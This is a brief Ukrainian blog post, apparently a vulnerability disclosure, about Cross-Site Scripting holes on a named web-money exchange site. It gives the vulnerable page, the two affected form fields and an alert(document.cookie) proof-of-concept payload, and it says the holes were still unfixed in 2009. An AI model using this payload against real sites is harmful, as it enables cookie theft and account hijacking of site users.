Уразливості на www.popolni.com.ua
20:35 03.06.200921.02.2008
У липні, 18.07.2007, я знайшов Cross-Site Scripting уразливості на проекті http://www.popolni.com.ua (обмінник веб грошей). Про що найближчим часом сповіщу адміністрацію проекту.
Останній раз стосовно обмінників веб грошей я писав про уразливості на exchengine.ru.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
03.06.2009
XSS:
POST запит на сторінці http://www.popolni.com.ua/a1_mob.php
"><script>alert(document.cookie)</script>
В полях: Номер телефона, Сумма пополнения.
XSS через GET:
Дані уразливості досі не виправлені.